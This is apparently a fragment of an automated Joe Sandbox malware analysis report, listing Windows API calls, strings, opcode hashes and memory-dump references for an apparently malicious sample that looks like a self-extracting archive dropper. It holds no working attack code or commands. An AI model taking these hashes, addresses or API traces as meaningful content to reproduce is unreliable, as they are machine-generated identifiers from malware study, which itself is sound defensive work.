                                                                                                                    • Instruction Fuzzy Hash: 3731C6F1E04248AAEF51EFA4CC45FEE7BB9AF45300F044065F849AB183D7B89A44CB65
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 0004D954
                                                                                                                    • _strncpy.LIBCMT ref: 0004D99A
                                                                                                                      • Part of subcall function 00051DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00081030,00000200,0004D928,00000000,?,00000050,00081030), ref: 00051DC4
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00050EB7
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00047F69,?,?,?), ref: 0004A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00047F69,?), ref: 0004A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00047F69,?,?,?,?,?,?,?), ref: 0004A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00047F69,?,?,?,?,?,?,?,?,?,?), ref: 0004A4C6
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176396367-0
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000691E0,?,00000000,?,00000001,?,?,00000001,000691E0,?), ref: 0006C9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006CA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00066CBE,?), ref: 0006CA70
                                                                                                                    • __freea.LIBCMT ref: 0006CA79
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 7475b8e514c2b479b430e3c589e0f4ebeefecbdfe7d9c6526ddd7792bc39f1fd
                                                                                                                    • Instruction ID: 12842c30fc39ad6f9b9e87f3d6008647a9c84e55a781b3aa4726f4cb747aafe0
                                                                                                                    • Opcode Fuzzy Hash: 7475b8e514c2b479b430e3c589e0f4ebeefecbdfe7d9c6526ddd7792bc39f1fd
                                                                                                                    • Instruction Fuzzy Hash: A031A072A0020AABEB25DFA4DC45DFE7BA6EB01314B144169FC44E6251EB39CD90DBA1
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0005A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0005A691
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 45c5a971e76b5da6cd09201a08de1b34001c030c7f5beda206fde9d6c0816e4c
                                                                                                                    • Instruction ID: 999d5ce80fd587aa72301c196bc1942abb76312ca347197ab43da1e63c45af75
                                                                                                                    • Opcode Fuzzy Hash: 45c5a971e76b5da6cd09201a08de1b34001c030c7f5beda206fde9d6c0816e4c
                                                                                                                    • Instruction Fuzzy Hash: 3CE0EC32942B21ABE2615B60AC1EF8B3E54AB06B52F414101FB0596290DB7C86048BA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005A699: GetDC.USER32(00000000), ref: 0005A69D
                                                                                                                      • Part of subcall function 0005A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005A6A8
                                                                                                                      • Part of subcall function 0005A699: ReleaseDC.USER32(00000000,00000000), ref: 0005A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0005A83C
                                                                                                                      • Part of subcall function 0005AAC9: GetDC.USER32(00000000), ref: 0005AAD2
                                                                                                                      • Part of subcall function 0005AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0005AB01
                                                                                                                      • Part of subcall function 0005AAC9: ReleaseDC.USER32(00000000,?), ref: 0005AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                    • Opcode ID: 8b7c01305b0b6614ee7f6fdcf5ec996d85fbe953e00df1ff30cda96777b600a0
                                                                                                                    • Instruction ID: 2a680c13b36c267f8beb96274b7f08a82ea77c763da1acbf3a033184302f6c13
                                                                                                                    • Opcode Fuzzy Hash: 8b7c01305b0b6614ee7f6fdcf5ec996d85fbe953e00df1ff30cda96777b600a0
                                                                                                                    • Instruction Fuzzy Hash: 5091F271608754AFE710DF25C844A2BBBE8FFC9701F00491EF99AD3221DB35A946CB62
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000475E3
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 0004A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004777F
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: 3f5523c71cefae6a279a55e4ee87eb525791082f451270d2cd4be4376dc4aee0
                                                                                                                    • Instruction ID: 921609d4bd0be6768452886e35a761a2bef8b287fdfcbab1cc3074f10c31a9ed
                                                                                                                    • Opcode Fuzzy Hash: 3f5523c71cefae6a279a55e4ee87eb525791082f451270d2cd4be4376dc4aee0
                                                                                                                    • Instruction Fuzzy Hash: ED415FB1904558A9EB25EB64CC59EEFB3BDAF41300F4040F6B609A2093DB745F89CB65
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: bbef74b8cb5b5e4b0d89209ea621724632b2210e3a3a43bafeb5ff2b730b9a8c
                                                                                                                    • Instruction ID: fd91dc088ac9759a7cc4a5b56d14f8c71fe31e1891583cbd929759ac06004f3d
                                                                                                                    • Opcode Fuzzy Hash: bbef74b8cb5b5e4b0d89209ea621724632b2210e3a3a43bafeb5ff2b730b9a8c
                                                                                                                    • Instruction Fuzzy Hash: E621F37290470A5AD735EA64D845FABB3DCDF81752F00042AF980C3142FB65EE4C87B2
                                                                                                                    APIs
                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010458,0005B270,?,?), ref: 0005DE18
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogParam
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 665744214-1780906847
                                                                                                                    • Opcode ID: 0cd816ab68eeb4b0b27fa0188b922c325908a18dbde6af524a5275f958dbb5b2
                                                                                                                    • Instruction ID: 744203060ddea2df943f57f5276b2a1e2887a0e5031426c353ec063c99beba0f
                                                                                                                    • Opcode Fuzzy Hash: 0cd816ab68eeb4b0b27fa0188b922c325908a18dbde6af524a5275f958dbb5b2
                                                                                                                    • Instruction Fuzzy Hash: D1110F726001446AEF21AE34DC02FEF37D8B705352F144026BD49AB181C7B8AD88D774
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0004F2E4
                                                                                                                      • Part of subcall function 0004F2C5: GetProcAddress.KERNEL32(000881C8,CryptUnprotectMemory), ref: 0004F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0004F33E), ref: 0004F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0004F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 0004F389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: 69f152cde07b76a5c2cecf2b831e16d7451addbb0cde5bf6c3c117fa56e3e825
                                                                                                                    • Instruction ID: c65a4a71582d254e0243fb70f341ab5b444c82bdd0d6efbcd05b1a0df6365ce1
                                                                                                                    • Opcode Fuzzy Hash: 69f152cde07b76a5c2cecf2b831e16d7451addbb0cde5bf6c3c117fa56e3e825
                                                                                                                    • Instruction Fuzzy Hash: C311D6B1E002266BEF15AF20DC4567E3798FF00751B048135FC456B252DE789E419799
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0004B9B8
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                    • Opcode ID: 21dbc0a38ae396139c268bed8430817dce9d23157fb2f93b32a7888896942722
                                                                                                                    • Instruction ID: 7dc06a1ac12a6781cfb8dee30962cf27458fc3e1b2d314c1e9451c310abda69e
                                                                                                                    • Opcode Fuzzy Hash: 21dbc0a38ae396139c268bed8430817dce9d23157fb2f93b32a7888896942722
                                                                                                                    • Instruction Fuzzy Hash: 0701B5A360431279DA70AB798C86DBBB7ECEF95770B50452AF544D6083EB30D85482F6
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00051160,?,00000000,00000000), ref: 00051043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0005108A
                                                                                                                      • Part of subcall function 00046C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00046C54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                    • Opcode ID: 3e838e0e66e703eeb0003f57e95d9fff5170f38daea1f569095d61b0b536459a
                                                                                                                    • Instruction ID: 78de940162f474eca6e65965328c25bb7d472ec9b43fea5cfb4ec06361b42ddf
                                                                                                                    • Opcode Fuzzy Hash: 3e838e0e66e703eeb0003f57e95d9fff5170f38daea1f569095d61b0b536459a
                                                                                                                    • Instruction Fuzzy Hash: 77012BB53003096BE3306E24DC51BF7739CFB40751F10002DFE86562C2CAE568C98724
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004E2E8: _swprintf.LIBCMT ref: 0004E30E
                                                                                                                      • Part of subcall function 0004E2E8: _strlen.LIBCMT ref: 0004E32F
                                                                                                                      • Part of subcall function 0004E2E8: SetDlgItemTextW.USER32(?,0007E274,?), ref: 0004E38F
                                                                                                                      • Part of subcall function 0004E2E8: GetWindowRect.USER32(?,?), ref: 0004E3C9
                                                                                                                      • Part of subcall function 0004E2E8: GetClientRect.USER32(?,?), ref: 0004E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                    • SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                    • Opcode ID: 35c84e86f2151c6aa9c38dde640f16ff232604fea626c39aeabb376aede61b24
                                                                                                                    • Instruction ID: bcc0e361166945f21d85a5e0b784eac03474afa575e4cbdf9fdedb2729dce501
                                                                                                                    • Opcode Fuzzy Hash: 35c84e86f2151c6aa9c38dde640f16ff232604fea626c39aeabb376aede61b24
                                                                                                                    • Instruction Fuzzy Hash: D6F04FB0144288AAEF552F60CC0EBEA3BD9AF45346F048224FD84555A1CBB8CAD1EB58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006BF30: GetEnvironmentStringsW.KERNEL32 ref: 0006BF39
                                                                                                                      • Part of subcall function 0006BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006BF5C
                                                                                                                      • Part of subcall function 0006BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006BF82
                                                                                                                      • Part of subcall function 0006BF30: _free.LIBCMT ref: 0006BF95
                                                                                                                      • Part of subcall function 0006BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006BFA4
                                                                                                                    • _free.LIBCMT ref: 000682AE
                                                                                                                    • _free.LIBCMT ref: 000682B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"
                                                                                                                    • API String ID: 400815659-2622329788
                                                                                                                    • Opcode ID: 153621c15f097b260d79b982e156f0c56472aff40a0a859766483b603a85ec95
                                                                                                                    • Instruction ID: abdb56c5fa96c49a48af2688e917361432b2cbf20c98fd64a843808df65938a0
                                                                                                                    • Opcode Fuzzy Hash: 153621c15f097b260d79b982e156f0c56472aff40a0a859766483b603a85ec95
                                                                                                                    • Instruction Fuzzy Hash: CEE02273A06D4351A7B172BE6C227EF17874FC2338B548326F920DB0C3CE58880247A2
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00051206,?), ref: 00050FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00050FF6
                                                                                                                      • Part of subcall function 00046C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00046C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00050FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0004DA55,?), ref: 0004E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004DA55,?), ref: 0004E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:33.3%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 7927 7ffd9beb980a 7930 7ffd9bebd6e0 QueryFullProcessImageNameA 7927->7930 7929 7ffd9bebd884 7930->7929

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2071267160.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: FullImageNameProcessQuery
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3578328331-0
                                                                                                                    • Instruction ID: b98fccd0d8eebff63d902f2398e7fa61d992de4464224f0fcc083a80d85286cb
                                                                                                                    • Opcode Fuzzy Hash: 587f863c12d382b9e95aac177516d16524a4dc93ab85f67bf209bc58b6a2ef90
                                                                                                                    • Instruction Fuzzy Hash: 46F0AB3120E64CCFDB41EB3CDCA50E43B50EF43208B4B12FBC088C7562C210184AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 50b7fee551aa51ed4495b90d960ea2dfa2fd4974072c7181fe5fb3249bceb4ed
                                                                                                                    • Instruction ID: 4430b26e91a70c5c8131641020c4af48e9d1b69953c89250b1d673a4ef5f73f6
                                                                                                                    • Opcode Fuzzy Hash: 50b7fee551aa51ed4495b90d960ea2dfa2fd4974072c7181fe5fb3249bceb4ed
                                                                                                                    • Instruction Fuzzy Hash: C5018F34A0E3898FE722EBA488542ADBFB0AF02314F1541E7D484DB1A7D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 285c13927dcb1f53607f0379e68cf6e7d7e4812785c5a902db2b089683fb3e8f
                                                                                                                    • Instruction ID: d26696a46681e285d400bfd58b341776aed3c857c9dee7354f98390e533c6bd1
                                                                                                                    • Opcode Fuzzy Hash: 285c13927dcb1f53607f0379e68cf6e7d7e4812785c5a902db2b089683fb3e8f
                                                                                                                    • Instruction Fuzzy Hash: ACE01A06F5FA2F02E57537ED68660FC72104FC4A28FA60172E41C860E6ACCE2685026A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: c2277998880809ceab64d287fd723d811344b58b83f6a113f6022b812cc2b603
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 9CE09270F0B50E4EF370BBA0C425BB9A2509F50300F0505B8D54E972E2CDFC6D808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b92d3f144aede9e6181f2497ac721954f2672474d374f7de5f8882d50639694
                                                                                                                    • Instruction ID: 1c32909861c96b3207cd2d36d8682487678e3cdc2fdc7e9030ad91c2bad8b023
                                                                                                                    • Opcode Fuzzy Hash: 3b92d3f144aede9e6181f2497ac721954f2672474d374f7de5f8882d50639694
                                                                                                                    • Instruction Fuzzy Hash: 18D05E00F1D45A5BE36AA36408208BA04860F95328F090234A01E962E9EC9C1A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: b720bbda805eb6feea1ef703b78fb58e0e5b4b83c0fe90d7bb9d259d3c638fab
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 41C04C3052580D8FCA54FB7DC98595476A0FB0D215BD60190E40DC7171E69A9D95D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f9bd5b7c055a8adc5226548f1e553392da6241cdc07abab4a0ce757127c62410
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C3C08C3051180C8FC908FB28C88582833A0FB09300BC20090E008C7174D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: db7d7326a4ed3d64de75acb640173bc13af19e40b23d4564a226e3b22930fddb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 4DB01200D5740F00E83433FA085607970405B44100FD20170D80C81091D8CE12D4034A
                                                                                                                    Memory Dump Source
